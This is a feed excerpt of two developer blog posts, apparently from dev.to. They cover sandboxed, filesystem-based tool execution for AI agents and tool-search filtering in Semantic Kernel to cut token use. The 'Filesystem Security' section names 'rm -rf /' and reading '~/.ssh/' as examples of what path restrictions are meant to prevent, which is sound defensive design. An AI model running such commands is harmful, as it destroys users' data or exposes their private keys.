  │      &amp;gt; ./sandbox/docs/pricing_results.json
  │
  │  $ mcp-cli brave-search/web_search '{"query": "competitor pricing"}' \
  │      &amp;gt; ./sandbox/research/competitors.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               │  (data now exists as files)
                               ▼
  ┌─ SANDBOX FILESYSTEM STATE ─────────────────────────────────────────
  │
  │  ./sandbox/
  │  ├── data/
  │  │   └── customers.json          # 500 customer records
  │  ├── docs/
  │  │   └── pricing_results.json    # vectorstore search results
  │  └── research/
  │      └── competitors.json        # web search results
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ LLM explores with bash (only pulls what it needs into context) ───
  │
  │  $ jq '.customers | length' ./sandbox/data/customers.json
  │  &amp;gt; 500
  │
  │  $ jq '.customers[] | select(.revenue &amp;gt; 1000000) | .name' \
  │      ./sandbox/data/customers.json | head -10
  │  &amp;gt; "Acme Corp"
  │  &amp;gt; "Globex Inc"
  │  &amp;gt; ...
  │
  │  $ grep -l "enterprise" ./sandbox/docs/*.json
  │  &amp;gt; ./sandbox/docs/pricing_results.json
  │
  └────────────────────────────────────────────────────────────────────
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Matters
&lt;/h3&gt;

&lt;p&gt;The traditional approach would send all 500 customer records directly into context. With filesystem-based execution:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;MCP call writes to file&lt;/strong&gt; → Data exists but isn't in context yet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent uses &lt;code&gt;jq&lt;/code&gt; to count&lt;/strong&gt; → Only "500" enters context (3 tokens)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent filters with &lt;code&gt;jq&lt;/code&gt;&lt;/strong&gt; → Only 10 company names enter context (~30 tokens)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent got what it needed&lt;/strong&gt; → Instead of 500 records (~50,000 tokens)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Phil Schmid's &lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;research on mcp-cli&lt;/a&gt; showed this pattern reduces tool-related token consumption from ~47,000 tokens to ~400 tokens—&lt;strong&gt;a 99% reduction&lt;/strong&gt;—because agents discover and use tools just-in-time rather than loading all definitions upfront.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Complete Flow
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  COMPLETE FILESYSTEM + MCP FLOW
═══════════════════════════════════════════════════════════════════════

  User Query: "Which enterprise customers mentioned pricing concerns?"
                               │
                               ▼
  ┌─ STEP 1: Fetch data via MCP CLI ───────────────────────────────────
  │
  │ $ mcp-cli database/query_customers '{"tier":"enterprise"}' \
  │     &amp;gt; ./data/customers.json
  │
  │ $ mcp-cli crm/get_conversations '{"customer_ids":"$CUSTOMER_IDS"}' \
  │     &amp;gt; ./data/conversations.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 2: Explore with bash ────────────────────────────────────────
  │
  │ $ jq -r '.[] | .id' ./data/customers.json | wc -l
  │ &amp;gt; 47
  │
  │ $ grep -l "pricing" ./data/conversations.json
  │ &amp;gt; (matches found)
  │
  │ $ jq '.[] | select(.text | contains("pricing")) | {customer, text}' \
  │     ./data/conversations.json &amp;gt; ./analysis/pricing_mentions.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 3: Extract only relevant context ────────────────────────────
  │
  │ $ cat ./analysis/pricing_mentions.json | head -50
  │ &amp;gt; [{"customer": "Acme", "text": "pricing seems high..."},
  │ &amp;gt;  {"customer": "Globex", "text": "need better pricing..."}]
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (informed   │
                        │   by ~50     │
                        │   relevant   │
                        │   lines)     │
                        └──────────────┘

  Token savings:
  ├── Without filesystem: 47 customers × 20 conversations × ~500 tokens = 470,000 tokens
  └── With filesystem: ~200 tokens (just the relevant pricing mentions)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Design Goals for My Experiment
&lt;/h2&gt;

&lt;p&gt;I want to build something that integrates with &lt;a href="https://github.com/justinbarias/holodeck-ai" rel="noopener noreferrer"&gt;Holodeck&lt;/a&gt;, which uses Semantic Kernel for agent orchestration. Here's what I'm aiming for:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Filesystem Security
&lt;/h3&gt;

&lt;p&gt;Letting LLMs run bash commands on your actual filesystem is... not great. The horror stories write themselves.&lt;/p&gt;

&lt;p&gt;My approach:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Copy-on-write isolation.&lt;/strong&gt; Like AgentFS, the agent operates in a sandboxed directory. Writes don't touch original files until explicitly committed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit logging.&lt;/strong&gt; Every file operation gets logged. Every. Single. One. AgentFS makes this queryable, and I want the same—know what the agent did, when, and be able to roll it back.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Path restrictions.&lt;/strong&gt; The agent only sees paths within its sandbox. No &lt;code&gt;rm -rf /&lt;/code&gt; accidents, no reading &lt;code&gt;~/.ssh/&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is non-negotiable for anything beyond toy experiments.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Token and Context Reduction
&lt;/h3&gt;

&lt;p&gt;This is where the programmatic tool calling pattern really shines.&lt;/p&gt;

&lt;p&gt;In traditional tool calling:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Model requests tool call&lt;/li&gt;
&lt;li&gt;Tool executes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Entire output goes back into context&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Model processes output&lt;/li&gt;
&lt;li&gt;Repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Query a database with 1000 rows? That's 1000 rows in your context window. Every. Single. Time.&lt;/p&gt;

&lt;p&gt;The filesystem pattern flips this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Command outputs get written to files&lt;/li&gt;
&lt;li&gt;To access results, the agent runs CLI commands: &lt;code&gt;head -20 results.json&lt;/code&gt;, &lt;code&gt;jq '.users[] | .name' data.json&lt;/code&gt;, &lt;code&gt;grep -c "error" logs.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;The agent pulls in only what it needs, when it needs it, in the format it needs it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is how Claude Code handles large codebases without blowing through context limits. It's also why Vercel saw their costs drop 75%.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Integration with Semantic Kernel Tool Calling
&lt;/h3&gt;

&lt;p&gt;Here's where I want to experiment. Holodeck already has tool definitions—vectorstore searches, MCP servers, custom functions. What if these could execute in "filesystem mode"?&lt;/p&gt;

&lt;p&gt;Imagine a &lt;code&gt;search_knowledge_base&lt;/code&gt; tool that, instead of returning results directly:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Runs as a subprocess&lt;/li&gt;
&lt;li&gt;Writes results to &lt;code&gt;./sandbox/outputs/search_001.json&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Returns just the path to the agent&lt;/li&gt;
&lt;li&gt;Lets the agent &lt;code&gt;cat&lt;/code&gt; or &lt;code&gt;jq&lt;/code&gt; the file as needed&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You get structured tool definitions for discoverability (the model knows what tools exist), but filesystem semantics for execution (the model controls what data actually enters context).&lt;/p&gt;

&lt;p&gt;This could layer nicely with the tool search pattern I already built. Filter tools dynamically, &lt;em&gt;then&lt;/em&gt; execute them in a sandboxed filesystem. Best of both worlds.&lt;/p&gt;

&lt;p&gt;What might this look like in practice? Today, Holodeck tools are defined like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;knowledge_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vectorstore&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;product-docs&lt;/span&gt;

  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcp&lt;/span&gt;
    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave-search&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What if we added an execution mode?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;knowledge_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vectorstore&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;product-docs&lt;/span&gt;
    &lt;span class="na"&gt;execution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;filesystem&lt;/span&gt;              &lt;span class="c1"&gt;# NEW: execute via CLI, write to file&lt;/span&gt;
      &lt;span class="na"&gt;output_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./sandbox/search&lt;/span&gt;

  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcp&lt;/span&gt;
    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave-search&lt;/span&gt;
    &lt;span class="na"&gt;execution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;filesystem&lt;/span&gt;
      &lt;span class="na"&gt;output_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./sandbox/web&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent would then call these as CLI commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;holodeck-tool knowledge_search &lt;span class="s1"&gt;'{"query": "pricing"}'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ./sandbox/search/001.json
&lt;span class="nv"&gt;$ &lt;/span&gt;holodeck-tool brave_search &lt;span class="s1"&gt;'{"query": "competitor analysis"}'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ./sandbox/web/001.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same tool definitions for discoverability. Filesystem semantics for execution. The agent still knows what tools exist (via the tool search pattern from my previous post), but now it controls &lt;em&gt;when&lt;/em&gt; and &lt;em&gt;how much&lt;/em&gt; of the output enters context.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Multi-Platform Support
&lt;/h3&gt;

&lt;p&gt;I'm on macOS. Most servers run Linux. Some people poor souls use Windows.&lt;/p&gt;

&lt;p&gt;The goal is cross-platform support, which means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No macOS-specific sandboxing (sorry, &lt;code&gt;sandbox-exec&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Abstracting filesystem operations through a clean interface&lt;/li&gt;
&lt;li&gt;Probably leaning on Docker for production isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the stretch goal. I'll be happy if macOS and Linux work cleanly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What This Isn't
&lt;/h2&gt;

&lt;p&gt;To be clear: this is an experiment. I'm not replacing Holodeck's core execution model with bash. The standard tool calling flow works great for most use cases, and the tool search pattern I built already handles the "too many tools" problem.&lt;/p&gt;

&lt;p&gt;What I'm building is an &lt;em&gt;additional&lt;/em&gt; capability—a &lt;code&gt;sandbox&lt;/code&gt; tool that agents can use when they need filesystem-style access for memory-intensive or retrieval-heavy tasks. Think of it as giving your agent a scratchpad with Unix superpowers.&lt;/p&gt;

&lt;p&gt;The eventual API might look something like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sandbox&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sandbox&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;base_path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./workspace&lt;/span&gt;
      &lt;span class="na"&gt;allowed_commands&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;cat&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;grep&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;ls&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;head&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;tail&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;find&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;jq&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;awk&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;audit_log&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./logs/sandbox.log&lt;/span&gt;
      &lt;span class="na"&gt;copy_on_write&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But that's getting ahead of myself. Implementation is for Part 2.&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Up
&lt;/h2&gt;

&lt;p&gt;In &lt;strong&gt;Part 2&lt;/strong&gt;, I'll dig into implementation details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Setting up the sandboxed filesystem&lt;/li&gt;
&lt;li&gt;Copy-on-write semantics (probably borrowing ideas from AgentFS)&lt;/li&gt;
&lt;li&gt;The command execution layer with proper escaping and timeouts&lt;/li&gt;
&lt;li&gt;Audit logging and rollback&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Part 3&lt;/strong&gt; will cover Semantic Kernel integration—making existing tools execute in "filesystem mode" and exposing the whole thing as a Holodeck tool.&lt;/p&gt;

&lt;p&gt;If you've built something similar or have thoughts on the approach, I'd love to hear about it.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post is part of a series on building filesystem-based agentic memory systems. Read my previous post on &lt;a href="https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh"&gt;reducing token consumption with tool search&lt;/a&gt; for context on the first pattern I implemented.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>architecture</category>
      <category>bash</category>
    </item>
    <item>
      <title>How I Reduced My Agent's Token Consumption by 83%</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 16 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh</link>
      <guid>https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxxn2y5cottpo909gc8i3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxxn2y5cottpo909gc8i3.png" alt=" " width="800" height="446"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(Excuse the bad meme image prompt, I'm new at this LOL)&lt;/p&gt;

&lt;h1&gt;
  
  
  How I Reduced My Agent's Token Consumption by 83%
&lt;/h1&gt;

&lt;p&gt;I was building a research agent with HoloDeck for paper search, Brave Search for web lookups, and a memory MCP server for knowledge graphs. Pretty standard stuff.&lt;/p&gt;

&lt;p&gt;Then I looked at my API call payload for a simple "hi there" message:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [...],
  "tools": [
    {"function": {"name": "vectorstore-search_papers", ...}},
    {"function": {"name": "brave_search-brave_image_search", ...}},
    {"function": {"name": "brave_search-brave_local_search", ...}},
    {"function": {"name": "brave_search-brave_news_search", ...}},
    {"function": {"name": "brave_search-brave_summarizer", ...}},
    {"function": {"name": "brave_search-brave_video_search", ...}},
    {"function": {"name": "brave_search-brave_web_search", ...}},
    {"function": {"name": "memory-add_observations", ...}},
    {"function": {"name": "memory-create_entities", ...}},
    {"function": {"name": "memory-create_relations", ...}},
    {"function": {"name": "memory-delete_entities", ...}},
    {"function": {"name": "memory-delete_observations", ...}},
    {"function": {"name": "memory-delete_relations", ...}},
    {"function": {"name": "memory-open_nodes", ...}},
    {"function": {"name": "memory-read_graph", ...}},
    {"function": {"name": "memory-search_nodes", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;16 tools.&lt;/strong&gt; For "hi there."&lt;/p&gt;

&lt;p&gt;The Brave Search MCP server alone exposes 6 functions with verbose parameter schemas (country codes, language enums, pagination options). The memory server adds another 9. Every single request was burning tokens on tool definitions the model would never use.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Anthropic Inspiration
&lt;/h2&gt;

&lt;p&gt;Anthropic's engineering team published a &lt;a href="https://www.anthropic.com/engineering/advanced-tool-use" rel="noopener noreferrer"&gt;fantastic post on advanced tool use&lt;/a&gt; that addressed exactly this problem. Their key insight: &lt;strong&gt;don't load all tools upfront—discover them on demand.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Their numbers were compelling: a five-server MCP setup went from ~55K tokens to ~8.7K tokens. An 85% reduction.&lt;/p&gt;

&lt;p&gt;I wanted that for HoloDeck. But I'm using Microsoft's Semantic Kernel, not Claude's native tool system. So I had to figure out how to make it work.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Architecture
&lt;/h2&gt;

&lt;p&gt;Here's what I built:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Query
    │
    ▼
┌─────────────────────────────┐
│     ToolFilterManager       │
│  ┌───────────────────────┐  │
│  │      ToolIndex        │  │
│  │  • Tool metadata      │  │
│  │  • Embeddings         │  │
│  │  • BM25 index         │  │
│  │  • Usage tracking     │  │
│  └───────────────────────┘  │
│             │               │
│      search(query)          │
│             │               │
│             ▼               │
│    Filtered tool list       │
└─────────────────────────────┘
    │
    ▼
┌─────────────────────────────┐
│  FunctionChoiceBehavior     │
│  .Auto(filters={            │
│    "included_functions":    │
│      ["tool1", "tool2"]     │
│  })                         │
└─────────────────────────────┘
    │
    ▼
Semantic Kernel Agent Invocation
(only selected tools in context)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three main components:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;ToolIndex&lt;/strong&gt; - Indexes all tools from Semantic Kernel plugins with embeddings and BM25 stats&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ToolFilterManager&lt;/strong&gt; - Orchestrates filtering and integrates with SK's execution settings&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FunctionChoiceBehavior&lt;/strong&gt; - SK's native mechanism for restricting which functions the LLM sees&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Building the Tool Index
&lt;/h2&gt;

&lt;p&gt;The first challenge: extracting tool metadata from Semantic Kernel's plugin system. SK organizes tools as functions within plugins, so I needed to crawl that structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def build_from_kernel(
    self,
    kernel: Kernel,
    embedding_service: EmbeddingGeneratorBase | None = None,
    defer_loading_map: dict[str, bool] | None = None,
) -&amp;gt; None:
    plugins: dict[str, KernelPlugin] = getattr(kernel, "plugins", {})

    for plugin_name, plugin in plugins.items():
        functions: dict[str, KernelFunction] = getattr(plugin, "functions", {})

        for func_name, func in functions.items():
            full_name = f"{plugin_name}-{func_name}"

            # Extract description and parameters for search
            description = getattr(func, "description", "")
            parameters: list[str] = []

            func_params: list[KernelParameterMetadata] | None = getattr(
                func, "parameters", None
            )
            if func_params:
                for param in func_params:
                    if param.description:
                        parameters.append(f"{param.name}: {param.description}")

            # Create searchable metadata
            tool_metadata = ToolMetadata(
                name=func_name,
                plugin_name=plugin_name,
                full_name=full_name,
                description=description,
                parameters=parameters,
                defer_loading=defer_loading_map.get(full_name, True),
            )

            self.tools[full_name] = tool_metadata

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each tool becomes a searchable document combining its name, plugin, description, and parameter info.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three Search Methods
&lt;/h2&gt;

&lt;p&gt;I implemented three ways to find relevant tools:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Semantic Search (Embeddings)
&lt;/h3&gt;

&lt;p&gt;The obvious choice. Embed the query, embed the tools, compute cosine similarity:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def _semantic_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -&amp;gt; list[tuple[ToolMetadata, float]]:
    # Generate query embedding
    query_embeddings = await embedding_service.generate_embeddings([query])
    query_embedding = list(query_embeddings[0])

    results: list[tuple[ToolMetadata, float]] = []
    for tool in self.tools.values():
        if tool.embedding:
            score = _cosine_similarity(query_embedding, tool.embedding)
            results.append((tool, score))

    return results

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Good for understanding intent. "Find information about refunds" matches &lt;code&gt;get_return_policy&lt;/code&gt; even though they share no keywords. Scores range from 0.0 to 1.0, with good matches typically in the &lt;strong&gt;0.4-0.6 range&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. BM25 (Keyword Matching)
&lt;/h3&gt;

&lt;p&gt;Classic information retrieval using &lt;a href="https://dl.acm.org/doi/10.1561/1500000019" rel="noopener noreferrer"&gt;BM25&lt;/a&gt; (Robertson &amp;amp; Zaragoza, 2009). Sometimes you want exact matches:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def _bm25_score_single(self, query: str, tool: ToolMetadata) -&amp;gt; float:
    query_tokens = _tokenize(query)
    doc_tokens = _tokenize(self._create_searchable_text(tool))

    # Count term frequencies
    term_freq: dict[str, int] = {}
    for token in doc_tokens:
        term_freq[token] = term_freq.get(token, 0) + 1

    score = 0.0
    for term in query_tokens:
        if term not in term_freq:
            continue

        tf = term_freq[term]
        idf = self._idf_cache.get(term, 0.0)

        # BM25 formula
        numerator = tf * (self._BM25_K1 + 1)
        denominator = tf + self._BM25_K1 * (
            1 - self._BM25_B + self._BM25_B * doc_length / self._avg_doc_length
        )
        score += idf * (numerator / denominator)

    return score

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Fast, no embeddings needed. Great for technical terms: "brave_search" should definitely match tools from the Brave Search plugin.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important gotcha:&lt;/strong&gt; The tokenizer must split on underscores! Tool names like &lt;code&gt;brave_web_search&lt;/code&gt; need to tokenize as &lt;code&gt;["brave", "web", "search"]&lt;/code&gt;, not as a single token. Otherwise queries containing "web" won't match the tool. I learned this the hard way when "find papers on the web" was returning &lt;code&gt;brave_image_search&lt;/code&gt; instead of &lt;code&gt;brave_web_search&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def _tokenize(text: str) -&amp;gt; list[str]:
    # Use [a-zA-Z0-9]+ to split on underscores (not \w+ which includes them)
    tokens = re.findall(r"[a-zA-Z0-9]+", text.lower())
    return tokens

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Hybrid (Reciprocal Rank Fusion)
&lt;/h3&gt;

&lt;p&gt;Why choose? Combine both with &lt;a href="https://dl.acm.org/doi/10.1145/1571941.1572114" rel="noopener noreferrer"&gt;Reciprocal Rank Fusion&lt;/a&gt; (Cormack et al., 2009):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def _hybrid_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -&amp;gt; list[tuple[ToolMetadata, float]]:
    semantic_results = await self._semantic_search(query, embedding_service)
    bm25_results = self._bm25_search(query)

    # Reciprocal Rank Fusion
    k = 60 # Constant from the original paper
    rrf_scores: dict[str, float] = {}

    semantic_sorted = sorted(semantic_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(semantic_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    bm25_sorted = sorted(bm25_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(bm25_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    # Normalize to 0-1 range (raw RRF scores are ~0.01-0.03)
    max_score = max(rrf_scores.values()) if rrf_scores else 1.0
    normalized = {name: score / max_score for name, score in rrf_scores.items()}

    return [(self.tools[name], score) for name, score in normalized.items()]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;RRF rewards tools that rank highly in &lt;strong&gt;both&lt;/strong&gt; methods without being dominated by either's raw scores.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Critical detail:&lt;/strong&gt; Raw RRF scores are tiny (0.01-0.03 range) because of the formula &lt;code&gt;1/(k+rank+1)&lt;/code&gt; with k=60. If you apply a &lt;code&gt;similarity_threshold&lt;/code&gt; of 0.3 to raw scores, &lt;em&gt;everything&lt;/em&gt; gets filtered out! You must normalize RRF scores to 0-1 range by dividing by the max score. After normalization, good matches score &lt;strong&gt;0.8-1.0&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Semantic Kernel Integration
&lt;/h2&gt;

